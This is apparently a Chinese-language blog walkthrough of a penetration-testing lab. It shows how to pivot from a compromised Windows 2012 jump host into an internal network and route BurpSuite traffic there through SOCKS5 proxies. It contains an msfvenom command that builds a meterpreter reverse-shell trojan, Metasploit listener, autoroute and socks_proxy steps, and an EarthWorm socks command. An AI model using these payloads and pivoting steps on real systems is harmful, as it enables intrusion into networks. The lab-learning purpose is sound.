目录
- burpsuite设置socks5代理访问内网
- burpsuite设置上游代理访问内网
- 1. msfvenom生成木马
- 2. 跳板机win2012运行木马
- 3. msf获取shell
- 4. msf起路由
- 5. 配置socks_proxy
- 6. 配置windwos
- 6.1 测试win7联通内网web
- 6.2 设置BurpSuite
纸上得来终觉浅,绝知此事要躬行。网上资料怎么写的都有,花了大半天时间整理了一下😔
burpsuite设置socks5代理访问内网
测试环境如下:
注意事项:关闭跳板机win2012的防火墙,否则可能出现隧道无法正常使用。
- 跳板机配置隧道
ew_for_Win.exe -s ssocksd -l 1080
- 配置BurpSuite
- 访问内网机器
burpsuite设置上游代理访问内网
msf拿下站点,如何转给BurpSuite?
拓扑图如下:
1. msfvenom生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.239.141 lport=4455 -f exe >r.exe
然后msf开启监听
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.239.141
msf6 exploit(multi/handler) > set lport 4455
msf6 exploit(multi/handler) > exploit
2. 跳板机win2012运行木马
3. msf获取shell
4. msf起路由
可以参考之前的文章:https://www.yuque.com/u1881995/pborfs/nf2nn5#rAXIQ
4.1 查看网络接口信息:run get_local_subnets
4.2 以CIDR的方式添加路由信息:run autoroute -s 192.168.195.0/24
4.3 查看活动路由列表,确认路由情况:run autoroute -p
5. 配置socks_proxy
配置socks_proxy,并运行
msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > show options
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Proxy password for SOCKS5 listener
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 1080 yes The port to listen on
USERNAME no Proxy username for SOCKS5 listener
VERSION 5 yes The SOCKS version to use (Accepted: 4a, 5)
Auxiliary action:
Name Description
---- -----------
Proxy Run a SOCKS proxy server
msf6 auxiliary(server/socks_proxy) > exploit
下图中可以看到,没有socks4a了,取而代之的是auxiliary/server/socks_proxy,但是在配置选项,可以看到其支持5和4a两种,这里就用默认的5就行,不需要做额外配置,直接运行。
6. 配置windwos
这个时候先缕一缕思路啊,跳板机直通内网,kali通过添加路由能间接通向内网。现在是如何让win7与kali之间建立隧道联系。在第5步中,msf开启socks连接,win7只需要把流量发到kali的1080端口即可。
6.1 测试win7联通内网web
我这里使用插件SwitchyOmega配置一个代理,指明协议(kali使用socks5)、kali的地址和kali监听的端口
试着访问一下,发现完全OK
此时让我们再来捋一下思路。
- win2012直通内网靶机
- msf直通win2012,通过添加路由,间接通向内网靶机
- win7直通kali,通过访问msf的socks5连接,将流量发送到kali
- 最终的体验效果,就像是win7可以通过浏览器访问内网debian的web服务
这里,就已经证明网络是通的了,下面就可以去设置BurpSuite了
6.2 设置BurpSuite
这里有个问题,我要使用BurpSuite,怎么玩呢?我们知道,win7是通过socks5协议与msf建立连接的,那么,我可以让win7的浏览器走BurpSuite,BurpSuite再把流量转发给本地的Socks代理工具,再由代理工具把流量发给msf即可。如下图
- 以管理员身份启动SocksCap64,它才可以导入本机安装的浏览器。首次启动画面如下
- 添加代理
完事后点击右侧的“保存”按钮即可。
- 测试网络是否通畅
- 开启全局代理
SocksCap64监听本地的25378端口
- BurpSuite设置顶级代理访问内网
上面内容是英文的,就啰嗦一下上面写的都是啥玩意吧。拿中文版的BurpSuite解释一下。
5.1 额外介绍的内容
以经典的burpsuite_pron_v2.1.07为例,安装java,激活BurpSuite之后,点击“创建桌面快捷方式.bat”,就会在桌面创建一个图标。
5.2 点击桌面的BurpSuite图标
- BurpSuite可以使用了
可以正常使用重放模块
